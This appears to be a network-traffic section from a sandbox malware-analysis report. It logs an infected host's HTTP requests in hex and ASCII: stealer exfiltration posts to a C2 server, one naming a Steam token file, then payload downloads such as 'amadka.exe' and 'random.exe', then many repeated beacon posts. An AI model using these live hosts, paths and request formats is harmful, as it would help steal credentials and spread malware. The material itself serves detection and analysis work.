------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------BGDGHJEHJJDAAAKEBGCFContent-Disposition: form-data; name="message"files------BGDGHJEHJJDAAAKEBGCF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCGHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="file"------HDGCFHIDAKECFHIEBFCG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 66 30 66 30 34 36 35 32 38 32 65 63 66 37 63 30 61 61 33 66 34 32 39 37 33 33 31 66 33 37 66 64 33 65 61 31 39 34 35 61 61 34 31 32 61 39 64 30 33 63 63 35 65 65 37 33 66 32 30 36 61 63 34 33 63 36 62 30 34 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"fbf0f0465282ecf7c0aa3f4297331f37fd3ea1945aa412a9d03cc5ee73f206ac43c6b04a------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="message"jbdtaijovg------IDHIIJJJKEGIDGCBAFIJ--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 30 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000022001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 30 31 42 33 34 46 38 43 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 2d 2d 0d 0a Data Ascii: ------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="hwid"2701B34F8C144293944220------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="build"default------GDBAKEGIDBGIEBFHDHJJ--
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 34 32 36 37 35 42 36 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A7BB42675B65082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
